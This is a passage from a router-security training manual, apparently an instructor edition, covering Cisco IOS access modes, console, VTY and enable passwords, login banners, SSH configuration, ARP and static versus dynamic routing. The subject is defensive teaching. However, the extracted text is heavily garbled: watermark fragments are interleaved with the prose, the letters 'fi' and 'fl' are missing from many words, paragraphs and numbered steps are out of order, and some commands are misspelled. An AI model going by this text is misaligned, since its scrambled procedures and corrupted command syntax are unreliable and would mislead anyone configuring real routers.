st
bug: An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction.
Most of the current routers in production are running versions 11.x or 12.x of the Cisco IOS. When Cisco makes a major release of the IOS, it is assigned a number, such as 11 or 12. Major releases can also be added to the numbers, such as 11.2 or 12.2. You might also see an IOS listed as version 12.0(3). The 3 in parenthesis is the third maintenance revision of the major release. Maintenance revisions are released every eight weeks and contain bug xes and/or updates, as Cisco dictates.
DU
The Cisco routers do have their own operating system, which is known as the IOS (Internetworking Operating System). The IOS is found on all Cisco routers and can be uploaded to or downloaded from a tftp site. It is common to copy the IOS image to the tftp location as a quick backup in the event that the running IOS gets corrupted.
PL
IC
AT
Along with the interface type, Cisco routers are numbered. The interface numbering begins with a zero. In other words: The rst Ethernet interface on the router is known as E0.
Ed
iti
A Cisco router has one or more connections to networks. Each of these connections is referred to as an interface. To further dene this interface concept, Cisco uses the type of interface as part of the name as well. Therefore: An interface that is connected to an Ethernet segment of the network always starts with an E.
on
Although this lesson is not designed to make you a Cisco or a routing expert, you will become familiar with the core functions of routers and how to best harden this critical component of the infrastructure.
Accessing the Router

Cisco provides a wide variety of access points for their routers. Each method of access can provide the ability to view the router differently. Some methods require the network to be functioning and active, while others do not require any network connectivity at all. The methods of access include the console port, the auxiliary port, or network access. Network access can, in turn, include VTY (terminal access), HTTP, TFTP, and SNMP. Each of these methods is detailed here: The console port is the main point of access on a Cisco router. This is a direct physical connection, requiring the router to be in the presence of the person using the port. This is the connection method used to create the initial conguration and in the event of an emergency, such as password recovery. Because it has direct physical access, the console port should not be the primary method of accessing the router.
Ways to Access the Router
The auxiliary port can be used to connect to the router via a modem. This can be a functional method of accessing the router if the primary network is down and you are not able to gain physical access to the router.
The VTY sessions provide for terminal access to the router. These connections require the network to be functioning to provide access. The most common method of accessing a VTY session is telnet, althoughfor security purposesSSH is supported, and is recommended. There are ve VTY ports on the router by default, and they are numbered 0 though 4. In this course, access will be provided by using VTY sessions. Other network access points like HTTP, TFTP, and SNMP are also supported on newer versions of the IOS. HTTP can be used if the router runs as a Web server, authenticating users for access. TFTP is used for loading IOS and conguration les, and SNMP can be used in full network management congurations.
or
DO NO
Enable ModeIn this mode, users can make more signicant changes to the router, including some of the router conguration options. The prompt for Enable Mode looks like this: Router#.
In
Generally, once you connect to the router, you will move to Enable Mode right away, since that is where much of the router management happens. As a side note, Enable Mode is often called Privileged Mode in text. So, you can consider Enable Mode and Privileged Mode to mean the same thingthe next level of router access beyond User Mode.
st
Global Conguration Mode (also known as Congure Terminal Mode)In this mode, users can make conguration changes that will affect the entire router. The prompt for Global Mode looks like this: Router(config)#.
In the router, there are several different modes an administrator can use. These range from simple, informational modes, to the complex modes of router conguration. There are several examples of the different modes listed below: User ModeIn this mode, users can see the conguration of the router, but will not be able to make any signicant changes to the router. The prompt for User Mode looks like this: Router>.
ru ct
DU
PL
Operating Modes
Modes of Operation
IC
AT
E
323
Ed
iti
on
SNMP: (Simple Network Management Protocol) Software used to control network communications devices using TCP/IP.
Configuration Fragments
In this lesson, you will see many examples of congurations of the router. It is not practical to list every step and every line entered for every option. Therefore, what you will see are called conguration fragments.
2. 3. 4. 5.
Enter the password for VTY access: L3tm3!n Enter the password for Enable Mode: P0w3r
Enter the command for Interface Mode: Interface Ethernet 0
2.
Router(Config)#Interface Ethernet0
Navigating in the Router
Navigation
ru ct

st
If you recall the rst letter of a command, but not the entire string, again the question mark can come in handy. For example, if you are trying to enter Enable Mode, but forgot how to spell enable, you can use the following command: Router>E? This command lists all the commands starting with the letter E with brief descriptions of their functions.
In
Other shortcuts to use are the Up Arrow and Down Arrow keys. Using these will scroll you through commands you have entered into the router for quick access. Finally, using key combinations can be helpful as well. Two examples of key combinations are Ctrl+A and Ctrl+E. Using the Ctrl+A key combination moves the cursor to the beginning of a command line.
324
DO
NO
This simple single character command will list for you all the available options at a given point in the router. For example, if you enter the question mark at the User Mode prompt, like so: Router>?, you will be given an alphabetical list of the commands that are options at this point. This command will yield a different set of commands than using the same question mark at the Enable Mode prompt (Router#?).
DU
PL
The Cisco router interface is a command-line interface, with a format that is similar to UNIX. For those of you getting started with the router, if you get lost in the command structure, here are some of the more common commands to learn and use. First is the question mark (?).
or
IC
AT
This conguration fragment goes right to the concept, or function, of the discussion. In this example, you cannot be in Enable Mode (identied by the Router# prompt), without rst accessing the router (probably by using Telnet), and entering the required credentials.
Ed
In this course, the command sequence listed previously will not be described lineby-line but with a conguration fragment. So, the steps to access Interface Mode will look like this: 1. Router#Config Terminal
iti
Enter the command for Congure Terminal Mode: Congure Terminal
on
For example, to navigate to an Interface Mode of a router, the following commands are required: 1. Connect to the router via an access method, such as telnet: Telnet 10.10. 10.10
Using the Ctrl+E key combination moves the cursor to the end of a command line.
As an FYI, if the Up Arrow and Down Arrow keys do not function on your system, you can use the key combination Ctrl+P in place of the Up Arrow key, and Ctrl+N in place of the Down Arrow key.
Authentication and Authorization
Ed
DU PL IC T
Configuring Access Passwords
Because there are several different methods of accessing the router, in order to provide security, you must be able to lock down these access points. The rst line of defense is to provide a password for these forms of access.
ru ct
or
DO NO
AT
Conguring Access Passwords
AAA methods include RADIUS and Kerberos. These methods provide for the full level of Authentication, Authorization, and Accounting that are required for AAA access methods.
Setting the Console Password
In
Router#config terminal Router(config)#line console 0 Router(config-line)#login Router(config-line)#password l3tm3!n Router(config-line)#^Z Router#
st
Because the console-port connection is used for direct access, it must have a strong password. This can be, and usually is, created during the initial setup of the router. In order to set the Console password, you will need to enter Congure Terminal Mode, and then enter the command line console 0. This is what gets you into the mode where the password can be created. The login command tells the router that a password is required, and the password command is used to enter the actual password. The conguration fragment looks like this:
E
325
In Cisco routers, there are two main categories of authentication. They are the AAA method and the non-AAA method (called traditional by some). AAA stands for Authentication, Authorization, and Accounting. Earlier, you were introduced to the methods of access, such as console, auxiliary, and VTY sessions. These are considered non-AAA access methods. Another non-AAA access method is called Terminal Access Controller Access Control System, or TACACS for short. They use a local username and password for authentication.
iti
In order for someone to have access to control a router, there must be both authentication and authorization. It is important to not get these two confused, as they are so similar. Authentication is the process of identifying a user, generally granting or denying access. Authorization is the process of dening what a user can do or is authorized to do. So, a user gains access to the router via authentication and gains control of the router via authorization.
on
Setting the Enable Passwords

The process for setting the Enable password is similar to the process for setting the Console password. And, you will notice the process for the following sections are all similar, only the object (such as the console or vty) is the difference.
Setting the VTY Password
or
DO NO
ru ct
In the following conguration fragment, the password is set for all VTY sessions, 0 through 4. Note that the process is nearly identical.
Router#config terminal Router(config)#line vty 0 4 Router(config-line)#login Router(config-line)#password l3tm3!n Router(config-line)#^Z Router
In
st
DU
PL
IC
Router#config terminal Router(config)#line vty 0 Router(config-line)#login Router(config-line)#password l3tm3!n Router(config-line)#^Z Router
AT
Conguration of the password for the VTY sessions is similar to creating the Console password. Remember that there are ve VTY sessions, numbered 0 through 4. When you are setting the VTY password, you can create a password for one or for all of these sessions. In this rst conguration fragment, the password is set for just the rst VTY session:
Ed
iti
Router#config terminal Router(config)#enable secret p@55w0rd Router(config)#login Router(config)#^Z Router#
on
As to the password itself, there are two different Enable passwords. The rst is the standard Enable password; the second is the Enable Secret password. The standard Enable password is used only for backwards compatibility. If the Enable Secret password has been congured, it will take precedence. The reason that the Enable Secret password is used over the standard Enable password is that the Enable Secret password is encrypted and cannot be read in plaintext in the router. The conguration fragment for setting the Enable Secret password looks like this:
TASK 5A-1
Configuring Passwords
1.
Creating User Accounts
ru ct
Implementing Banners
st
In addition to having proper passwords on the router, it is important to have adequate warning banners. It is highly recommended that you view these banners as warning banners and not as welcome banners, as they used to be called. A warning banner is not designed to be the end-all of security; most people know a banner will not stop a determined attacker. However, a banner can provide some legal backing for you and your organization.
DO
NO
DU
Conguring Banners
Router#configure terminal Router(conf)#username Auser Router(conf)#username Buser Router(conf)#username Cuser Router(conf)#username Duser Router(conf)#^Z Router#
password password password password
u$3r1 u$3r2 u$3r3 u$3r4
In
PL
IC
To create local user accounts, the command syntax is only one line. In organizations where there are multiple people managing the router, this is a solid practice. The following conguration fragment shows the creation of several user accounts:
or
AT
Although for regular operation of the router, individual user accounts are not required, when you do add them, it allows for another level of control over the router and over router access.
Ed
Router#configure terminal Router(config)#line console 0 Router(config-line)#login Router(config-line)#password ACC3$$ Router(config-line)#^Z Router# Router#configure terminal Router(config)#line vty 0 4 Router(config-line)#login Router(config-line)#password +3ln3+ Router(config-line)#^Z Router#
E
327
iti
on
Create the conguration fragment that you would use to set the Console password of ACC3$$, and to set all VTY sessions to use the password of +3ln3+.
There are four general functions that warning banners should provide. Although you should look to professional legal counsel for the exact wording, your banner should address each of these. The banner should: Not provide useful technical or non-technical information that an attacker can use.
Dene who is and who is not an authorized user of the system(s).
Provide adequate legal standing to both prosecute offenders and protect the administrators of the equipment.
Ed
T DU
Warning!!! This system is designed solely for the authorized users of Company X on official business. Users of this system understand that there is no expectation of privacy, and that use of the system may be monitored and recorded. Use of this system is consent to said monitoring and recording. Users of this system acknowledge that if monitoring finds evidence of misuse, abuse, and/or criminal activity, that system operators may provide monitoring and recording data to law enforcement officials.
st
328
In
DO
ru ct
On the Cisco router, there are several types of banners available: MOTD bannerThe MOTD banner is for setting Messages Of The Day. This is not an efficient location for the default warning banner. The reason this is not an efficient location is that the MOTD banner is something that literally can change with each day. You do not want to be setting the warning banner each and every day, and worrying about missing a day. This banner is used for sending notices to users, such as if there is an upcoming system shutdown for upgrading the IOS. Login bannerThe login banner is where the warning banner should be located. This banner will be shown to each user every time a login attempt happens. The banner is set in Congure Terminal Mode, and uses a beginning and ending delimiter character. The delimiter can cause confusion, but is quite simple. Any character can be used as a delimiter, you just must make sure to use the same character at the beginning and the end. In the following conguration fragment, the letter C is used as the delimiter character:
or
NO
PL
IC
AT
Implementing Cisco Banners
iti
The following is an example of what a banner could look like for an organization:
on
Inform users of the system(s) that their actions are subject to recording, and may be used in a court of law.
or
DO NO
Configuring Login Banners

1.
Create the conguration fragment that you would use to create a login warning banner. You can include whatever text you like for the banner, but use the letter B as your delimiter.
In
Router#configure terminal Router(config)#banner login B Warning!!! This is the login banner for the SCNP HTI class. If you are not a member of this class, you may not access this system. Users of this system are advised that nearly everyone is running packet-capturing utilities and everyone is watching you! B Router(config)#^Z Router#
st
A possible response is:
DU
TASK 5A-2
ru ct
PL
IC
Router#configure terminal Router(config)#banner exec # Reminder!!! When you logged into this system, you acknowledged that you are an authorized user of Company X systems. You also acknowledged that your use of this system may be monitored and recorded. Finally, you agreed that if misuse, abuse, and/or criminal activity are found while monitoring, that law enforcement officials may be contacted. # Router(config)#^Z Router#
Ed
EXEC bannerThe EXEC banner is used for setting a message for users who enter EXEC, or Privileged, Mode. You can create a new banner; use the same warning banner, or whatever else you wish. The process for setting a new banner is nearly identical to the process for the login banner. The difference is in the command. Instead of the command banner login, you use the command banner exec. In the following conguration fragment, you can see the exec banner created, with a delimiter of the pound sign (#):
AT
E
329
iti
on
Router#configure terminal Router(config)#banner login C Warning!!! This system is designed solely for the authorized users of Company X on official business. Users of this system understand that there is no expectation of privacy, and that use of the system may be monitored and recorded. Use of this system is consent to said monitoring and recording. Users of this system acknowledge that if monitoring finds evidence of misuse, abuse, and/or criminal activity, that system operators may provide monitoring and recording data to law enforcement officials. C Router(config)#^Z Router#
SSH Overview
Although Telnet is used in this courseand is often the method of choice for many administratorsfrom a security perspective, it is not a solid option. This is due to the fact that there is no encryption on the session; all commands and responses are cleartext and can be viewed by any packet-capture utility. SSH, or Secure Shell, provides for a higher level of security on remote connections to the router. Using RSA public key cryptography, SSH establishes a secure channel of communication between client and server.
Not all versions of the IOS support SSH. Versions that support IPSec also support SSH.
Cisco IOS support for SSH is not present in older versions of the IOS, such as 11.2 and 11.3. After version 12.0(5) with IPSec, support for SSH was included. And, only IOS versions that have IPSec will have SSH support. In order for SSH sessions to be established, there is some preparation that must take place on the router. The router must have usernames dened, must have a hostname dened, and must have a domainname set.
Router Configuration to use SSH
or
DO NO
ru ct
Router#configure terminal Router(config)#ip domain-name scp.mil Router(config)#access-list 23 permit 192.168.51.45 Router(config)#line vty 0 4 Router(config-line)#access-class 23 in Router(config-line)#exit Router(config)#username SSHUser password No+3ln3+ Router(config)#line vty 0 4 Router(config-line)#login local Router(config-line)#exit Router(config)#
In
st
The router conguration is close to being nished, but there is still some work to be done. RSA must be enabled so that the key pair can be generated and used. When creating a new key pair, be aware that it may take some time for the pair to complete. In this fragment, all you will see is the command of creating the key pair crypto generate rsa and the use of 1024 as the number of bits (Cisco recommended minimum), and the OK when the calculation is done.
DU
PL
IC
In this conguration fragment, ACL 23 is used to dene the host that is allowed to access the router for administration. The host name of the router is simply Router and the domain will be scp.mil. The username is SSHUser and the password for this user is No+3ln3+.
AT
In implementing SSH, you should use Access Control Lists, controlling VTY access. A later section fully details an Access Control List (ACL). However, in brief, the ACL is used to regulate access (denial or permission) to an object on the router.
Ed
iti
on
You have now enabled SSH to run on your router. There are some commands that you can use to ne-tune the SSH function, and you will need to congure your client to use SSH. The following conguration fragment is used to dene the timeout, in seconds, that the server will wait for the client to provide a password. The default is 120 seconds, and the Cisco recommended time is 90 seconds. In this fragment, the time has been changed to 45 seconds.
Router#configure terminal Router(config)#ip ssh timeout 45 Router(config)#^Z Router#
ru ct
Encryption 3DES State 4
SSH Verification
st
Router#show ip ssh Connection Version 0 1.5 Router#
In
If you are running IOS version 12.1, and you want to see the state of SSH connections, including who is connected, use the command show ip ssh. The following fragment lists what this command will reveal.
Username SSHUser
DO
On the router, you will want to run some diagnostic commands to nd out who is connected and how. These commands will show you the state of your SSH connections. There are some differences based on the IOS version you are running, so note that in the following.
NO
T
Router#configure terminal Router(config)#line vty 0 4 Router(config-line)#transport input ssh telnet Router(config-line)#^Z Router#
DU
PL
Finally is the conguration to let the VTY sessions on the router accept both SSH and Telnet as valid connection types. If you want to have only SSH used, which is the point here, you would not add the word Telnet to the command.
IC
Router#configure terminal Router(config)#ip ssh authentication-retries 2 Router(config)#^Z Router#
or
AT
The next fragment is used to dene the number of retries that will be allowed before the router drops the connection. The default for this setting is 3, and the maximum is 5. This is a setting that you may rarely change, but in the fragment, the retries are set to 2, so after the second bad try, the connection is dropped:
Ed
E
331
iti
on
Router#configure terminal Router(config)#crypto key generate rsa The name for the keys will be: Router.scp.mil Choose the size of the key modulus in the range of 360 to 2048 for your General Purpose Keys. Choosing a key modulus greater than 512 may take a few minutes. How many bits in the modulus [512]: 1024 Generating RSA keys ... [OK] Router(config)#
If you are running IOS version 12.2, there are two commands for viewing SSH information. First is the show ip ssh command, only here it lists the details, such as timeout and version. The second command is show ssh, and this shows the user connected. The following fragment shows both commands used, one after the other, and their result onscreen.
INSTRUCTOR TASK 5A-3
Setup: Observe as your instructor performs the SSH conguration on the LEFT and RIGHT routers. 1. 2. 3. 4. Console in to the LEFT router, and switch to EXEC mode.
Enter ip domain-name left.com to provide a domain name. Enter crypto key generate rsa to create key pairs. When you are prompted for the number of bits in the modulus, press Enter to accept the default of 512. Enter ip ssh time-out 120 to set the timeout value to 2 minutes. Enter is ssh authentication-retries 3 to limit the number of unsuccessful attempts.
or
DO NO
ru ct
5. 6. 7. 8. 9.
Enter transport input ssh to limit the VTY sessions to accept only SSH connections. Enter login local to provide for local login.
In
332
st
10. Enter exit to return to the LEFT(cong)# prompt. 11. Enter username sshl01 privilege 15 password sshpass to assign a user name and password for student station L01. Repeat this command to assign user names and passwords for all other student stations on the left side of the classroom. 12. Enter exit to return to the LEFT# prompt.
Enter line vty 0 4 to begin the line conguration. The LEFT(cong-line)# prompt is displayed.
DU
PL
IC
AT
At the LEFT# prompt, enter conf t to switch to cong mode. The LEFT(cong)# prompt should be displayed.
Ed
Configuring SSH on a Router
iti
on
Router#show ip ssh SSH Enabled - version 1.5 Authentication timeout: 45 secs; Authentication retries: 2 Router#show ssh Connection Version Encryption State Username 0 1.5 3DES Session Started SSHUser Router#
13. Enter copy ru st to save the conguration changes. Press Enter to accept the default le name. 14. Enter exit to return to the LEFT> prompt. 15. Disconnect from the LEFT router, and console in to the RIGHT router. 16. Use the steps listed previously as a guide to set up SSH on the RIGHT router. Use the domain name right.com, and create user names such as sshr01, sshr02, and so forth. 17. Disconnect from the RIGHT router, and close the console.
Client Configuration to use SSH
or ru ct st
Figure 5-1: The client conguration for an SSH session.
During the conguration, you will be asked to provide input on the cryptography used, and you will select RSA. Additionally, you will be required to present proper credentials when connecting, meaning the local username on the router and the password. Once you enter the proper credentials, you will have secure access, and operation will be no different than using Telnet.
Lesson 5: Routers and Access Control Lists 333
In
DO
NO
DU
PL
IC
AT
Just as there was some conguration required on the server, some conguration is needed on the client side to run SSH. However, the conguration on the client is not nearly as complex. In general, a client SSH application must be installed, and the client must be congured to use the application in communication with the router. There are several SSH Client programs available, and in this example, the PuTTY program is used. Figure 5-1 shows an example of the settings for this application.
Ed
iti
18. Try to Telnet to either of the ssh-enabled routers, and ask students to do the same. None of the attempts should be successful, as you have blocked Telnet connections on both routers.
on
TASK 5A-4
Configuring the SSH Client
1.
Provide students with the location of the PuTTY installation program.
Copy the le putty.exe from the location provided by your instructor to your boot partition. The PuTTY program is a popular freeware package.
3.
Provide students with the IP addresses for the LEFT and RIGHT routers.
For Host Name, enter the IP address for your router. Your instructor will provide the router IP addresses. The router you use is named LEFT or RIGHT, based on your location in the classroom. Click SSH (Port 22).
4. 5. 6. 7. 8. 9.
Click Open to initiate the connection.
When you are prompted, click Yes to accept the key, and click Yes to continue the connection. Press Enter to display the login prompt.
Ed
T DU
After authentication has taken place, log out and close PuTTY.
st
The ARP Process
In
Most people are aware that routers function at the Network layer, but that statement must be understood as routers route at the Network layer. Routers are affected by and operate at other layers as well, including the Data Link layer. The OSI model is the foundation of all network communication. Routers t into the OSI model just as other devices do, with their primary functionality being at the Network layer. In this lesson, the vast majority of the content will be focusing on the Network layer; however, there are important areas of the Data Link layer that must be investigated as well.
334
DO
ru ct
Topic 5B
Routing Principles
NO
To be able to secure your routers and routed networks, you need to understand some basic principles related to routing in general. Lets begin by looking at how routers and routing t into the OSI Model.
PL
IC
Enter sshpass to complete the login sequence.
or
AT
Enter your ssh user name, such as sshl01. You should be prompted for a password.
iti
2.
Double-click putty.exe.
on
Setup: You are logged on to Windows 2000 Server as the renamed Administrator account. The routers have a limited number of simultaneous logins, so you might need to take turns accessing the routers if your class has many students in it.
MAC addresses are split into two parts, each containing six hexadecimal digits. The rst six digits represent the vendor code (manufacturer indicator) or OUI (Organizational Unique identier), and the second six are left for denition by the vendor and are often used as a serial number. These unique 48-bit numbers are designed to be globally unique, meaning that there is only one NIC with a given MAC address on the entire planet. ARP (RFC 826) is used to make the connection between the Layer Two and Layer Three addresses. ARP is used in the following examples of data moving from one host to another. The rst example shows data moving from node 1 to node 2 on a local network segment. In order for the data to arrive properly, the following steps must occur: 1.
2.
3.
Node 2 identies the message requesting its MAC address and responds by sending its Data Link address. Node 2 also stores the MAC address of Node 1 for future use. Node 1 sends the packet directly to the Data link address of Node 2.
4.
or ru ct st
2.
AT PL IC
Figure 5-2: This example shows the process of a local ARP broadcast between two nodes. To take this concept a bit further, lets look at the process of MAC address resolution if Node 2 is not on the local segment (see Figure 5-3). In order for communication to take place between Nodes 1 and 2, the following steps must occur: 1. Node 1 determines that it needs to communicate with Node 2. As with all TCP/IP communication, Node 1 ANDs its IP address with its subnet mask, then it ANDs Node 2s IP address with the Node 1 subnet mask.
In
Node 1 compares the results of the two AND processes to determine if they are the samemeaning that the nodes are on the same networkor
DO
NO
DU
E
Local ARP Broadcast Between Two Nodes
Figure 5-2 shows this process between Node 1 and Node 2 on the same segment.
Ed
Since Node 1 sent a broadcast, all nodes on the local segment receive and process the request, discarding it when they identify that the broadcast was not intended for them.
iti
Node 1 (knowing the Network layer address of node 2) sends a local broadcast on the LAN indicating that Node 1 wishes to learn the Data Link address for Node 2.
on
The IEEE (Institute of Electrical and Electronic Engineers) issues MAC addresses to network hardware vendors to ensure that MAC addresses remain unique.
Layer Two addresses are used to get data packets from one local node to another local node, while Layer Three addresses are used to get data packets from one network to another network.
335
differentmeaning that the nodes are on different networks. In this example, the results are different, so Node 1 can conclude that Node 2 is situated on a different network than Node 1. 3. If Node 1s TCP/IP stack is congured with a Default Gateway, Node 1 will use ARP resolution for the Default Gateway address, as explained in the previous example (because Node 1s Default Gateway will most likely be on the same network as Node 1), and store the Default Gateway address as the address to use for reaching Node 2.
Ed or ru ct st
ARP Broadcast Between Two Nodes on Different Networks
336
In
These examples are geared towards TCP/IP as a protocol, and we will use TCP/IP throughout this lesson. IP addressing is the primary example of Network layer addressing used today.
DO
Figure 5-3: This example shows the process of a router returning the ARP request of a remote node.
NO
DU
PL
IC
AT
iti
Note:If a Default Gateway is not congured for Node 1, then Node 1 will not be able to communicate with Node 2. In fact, if a Default Gateway is not congured and Node 1 attempts to ping Node 2, it should receive a message stating that the destination host is unreachable. For a ping to be successful across a routed network such as the one in this example, Node 2 should also have an appropriate Default Gateway in its IP conguration. If Node 2 exists but is not congured with a Default Gateway, and if Node 1 attempts to ping Node 2, Node 1 should receive a message stating that the request timed out.
on
LAN-to-LAN Routing Process

The process of moving data from one host to another and from LAN to LAN is not complex. In the example shown in Figure 5-4, there is one router connecting two networks. There are two hosts dened, one on either network, using TCP/IP.
Ed or
Figure 5-4: Two networks connected by a single router.
ru ct
An Ethernet packet will be generated at Node 7 with the IP source address as 10.0.10.115 and the source MAC address as Node 7. The destination IP address will be 20.0.20.207 with the destination MAC address still unknown.
st
When the router hears the request for the MAC address of host 20.0.20.207, it replies to node 7 with its MAC address. Node 7 then sends the packet to the router with a destination IP address of 20.0.20.207 and the MAC address of the E0 interface of the router. Once the router receives the packet, it in turn sends a broadcast for the MAC address of 20.0.20.207. Node 10 responds to this request, and the router receives the response. A new packet is then generated by the router, addressed to IP address 20.0.20.207 from IP address 10.0.10.115 with the source MAC address of the router, and destination MAC address of Node 10. Node 10 receives the packet and responds, following the same steps.
In
DO
NO
From this diagram, you can see the networks are connected via a single router. Both interfaces are Ethernet interfaces, and the IP addresses are given. In this example, node 7 is trying to get a packet to node 10. Since the nodes are in different networks, the packet will need to be routed to reach its goal.
DU
PL
IC
AT
E
337
iti
on
Two Networks Connected by a Single Router
LAN-to-WAN Routing Process

The LAN-to-WAN routing process is not much different than the previous examplethere are simply more steps involved and the packet may change encapsulations along the way from Ethernet to something else and back to Ethernet. In the example shown in Figure 5-5, there is a routed network with two LANs connected via multiple routers in a WAN conguration.
Two Nodes Connected in a WAN Conguration
Ed or ru ct st
Figure 5-5: Two end nodes connected over multiple routers in a WAN conguration.
In
DO
NO
DU
PL
IC
AT
iti
on
For a packet to get from Node 7 to Node 10 in this conguration, there are several steps that must happen: 1. 2. Node 7 creates a request for the MAC address of node 50.0.50.150. The router connected to Network 10.0.10.0 sees this request, and realizes it is the path to the destination network. It replies to Node 7 with its MAC address.
3.
Node 7 creates a packet with the source IP address of 10.0.10.115 and the destination IP address of 50.0.50.150 and a source MAC of Node 7 and destination MAC of the network 10.0.10.0 router. As the local router receives the packet, the IP source and destination IP addresses do not change. The encapsulation may change to t the wire, PPP or Frame Relay for example.
4.
5. 6.
The packet is sent from one router to another, each time the IP address does not change. Once the packet reaches the router for segment 50.0.50.0, the encapsulation is removed, and you are left with an Ethernet packet with source IP address 10.0.10.115 and destination IP address 50.0.50.150, and source MAC of the local E0 interface of the local router and destination MAC address of Node 10.
ru ct
1.
2.
3. 4.
Expand Frame Four.
st
Record the source and destination IP addresses and the source and destination MAC addresses here: Source IP address: 172.16.10.1. Destination IP address: 172.17.10.1.
5.
In
Source MAC address: 00 D0 09 7F 0D 73. Destination MAC address: 00 00 0C 8D B8 54. If you need to, expand IP and Ethernet so that you can see the addresses. Expand Frame Five, and record those IP and MAC addresses as well.
DO
NO
Quickly scroll through the main capture, noting the frames and their functions. You will see it is a capture of an initial ARP process, then two consecutive pings (Echo and Echo:Reply) packets.
DU
On your course CD-ROM, navigate to the \085545\Data\Captures folder, and open the ping-arp-mac.cap le. The le should open in Network Monitor.
PL
IC
or
Performing IP and MAC Analysis
AT
E
339
TASK 5B-1
Ed
iti
on
Source IP address: 172.17.10.1. Destination IP address: 172.16.10.1. Source MAC address: 00 00 0C 8D B8 54.
6. 7. 8.
Observe that, when pinging 172.17.10.1 from 172.16.10.1, the destination MAC address is 00000C8DB854. Examine the exchanges in frames 6 and 7, 8 and 9, and 10 and 11 to see the ping process complete. Expand Frame Twelve, and record those IP and MAC addresses as well. Source IP address: 172.16.10.1.
Destination IP address: 172.18.10.1.
Source MAC address: 00 D0 09 7F 0D 73.
Destination MAC address: 00 00 0C 8D B8 54. 9. Expand Frame Thirteen, and record those IP and MAC addresses as well. Source IP address: 172.18.10.1. Destination IP address: 172.16.10.1. Source MAC address: 00 00 0C 8D B8 54.
Ed
T DU
or
DO NO
Potential Data Paths
340
In
st
ru ct
10. Observe that when pinging 172.18.10.1 from 172.16.10.1, the destination MAC address is 00000C8DB854. 11. Examine the exchanges in frames 14 and 15, 16 and 17, and 18 and 19 to see the ping process complete. 12. Leave Network Monitor open.
The Routing Process
Figure 5-6 shows a complex network, with many possible paths for the data to take across the network. The routers will have to communicate with each other in order to determine the path for the given situation.
PL
Destination MAC address: 00 D0 09 7F 0D 73.
IC
AT
iti
on
Destination MAC address: 00 D0 09 7F 0D 73.
Ed or
DO NO
Figure 5-6: Potential paths that data can take to get from one node to another.
ru ct
DU
In order for the routers to exchange their data, they must have mutual paths of communication. These paths are the actual connections between the routers. By using logical addressing, the routers are able to have dened networks to transmit data on. The logical addressing minimizes the use of broadcasting, with the end result being more bandwidth for data transmission. In Figure 5-7, each segment with a letter is a unique Layer Three network segment.
PL
Logical Network Addressing
In
st
IC
AT
E
341
iti
on
Ed or
DO NO
Figure 5-7: Logical network addressing used in an internetwork.
ru ct
Static and Dynamic Routing

In order for the router to be able to make decisions on where data should go, it needs to consult its routing table. The routing table is the list of available networks and the paths to reach those networks. (Routing tables will be discussed in detail in the next topic.) Every time a packet reaches a router, the router needs to review the routing table to determine the appropriate path for the packet. The router must be aware of the other potential networks and the way to reach these networks.
In
st
DU
The routers will use the information about the paths to which they are connected, including the type of connection and available bandwidth, to determine the routes for data to take. For example, the routers might now say for a packet to get from network A to network N that the packet should take network A to network B to network D to network H to network J to network K to network M to network N. There are many times when the fastest route is not a straight path!
PL
IC
AT
iti
on
Static Routes
The creation of these paths can happen either dynamically (automatically) or statically (manually). The rst of these two concepts, static routing, is dened here.
Precise control over the routes data will take across the network. Easy to congure in small networks. Reduced bandwidth use, due to no excessive router traffic. Reduced load on the routers, due to no need to make complex routing calculations.
Figure 5-8 shows a simple network conguration with two routers and their dened networks.
Ed or ru ct
Figure 5-8: Two routers, Finance and Marketing, and the networks they connect.
st
Dynamic Routes
From the previous example, you can see that the command syntax and time to enter the static routes is not complex and will not take a lot of time. However, the previous example is a very small simple network, and it is because of its simplicity that static routes will work.
In
FinanceRouter#config terminal FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2 FinanceRouter(config-line)#^Z FinanceRouter#
DO
MarketingRouter#config terminal MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0 20.0.20.1 MarketingRouter(config-line)#^Z MarketingRouter#
NO
The conguration fragments for the static routes of the above routers look like the following:
DU
PL
IC
AT
iti
Sample Network for Static Routing
on
A static route is a route that has been manually entered into the router to dene the path to the remote network. Although its use is not desirable for every situation, static routing has many advantages, such as:
Benets of Static Routing
When the networks become more complex, static routing is not always a reasonable option. If there were a dozen routers, for example, each connected to several networks, static routing would become much more complex. This is where dynamic routing enters the equation. Dynamic routing protocols can change the conguration of the network when a link goes down. Dynamic routing protocols can converge to be sure that all routers have a consistent view of the network. And, dynamic routing protocols have the means to calculate the best path through an internetwork. Dynamic routing protocols use mathematical algorithms to determine routes and communicate with one another. These same routers exchange their information at dened intervals, and these updates are used to make decisions on routes to take and reconguration, when required. Because the routers are exchanging this data frequently, they are able to change paths and update as needed. This exibility is what makes dynamic routing protocols so desirable. If a router goes down somewhere in the network, the remaining routers will recongure and nd a way for the data to reach the other side of the network. An example of this is shown in Figure 5-9.
Multiple Data Paths
Ed
T DU
or st In
Figure 5-9: There are several routers and multiple paths data can take across this internetwork.
DO
ru ct
NO
PL
IC
AT
iti
on
In the event that Finance Router 2 goes offline, and these routers are using dynamic routing, the other routers will recongure themselves to use only the other Finance Router. When the offline router comes back online, the other routers in the network will recongure themselves accordingly.
Comparing Routed Protocols and Routing Protocols
What are Routed Protocols?

For a protocol to be considered a routed protocol, it must have the following characteristics: It must contain Network-layer addressing information. It must have a method of locating a single host on a given network.
or
DO NO
ru ct
Routers will use their assigned routing protocols to create, maintain, and exchange routing data. The routers can use the same routing protocols to actually forward the data packets from one network to another, including the decisions on which path is the best path to take for the data. These routing protocols can also be used by routers to learn the status and congurations of networks they are not directly connected to. In addition to learning about other remote networks, the routers will use their routing protocols to tell remote routers about networks that the remote router is not directly connected to. Regardless of the routing protocol chosen, the routers must have consistent and open communication between each other in order to maintain a reliable picture, or map, of the network. It is this map of the network that all the routers will use to assist in forwarding data packets from network to network. Some examples of routing protocols are RIP (Routing Information Protocol), IGRP (Interior Gateway Routing Protocol), and OSPF (Open Shortest Path First). Whether the protocol used is RIP, IGRP, or OSPF, it is important to consider that there is no actual end-user data carried by the routing protocol messages. The user data is carried by the routed protocol.
In
st
DU
While a routed protocol is used to carry data from one host to another, a routing protocol is used to carry data from one network to another, across multiple routers. The routing protocol is also the method of transmitting the routing updates and messages between routers.
PL
What are Routing Protocols?
IC
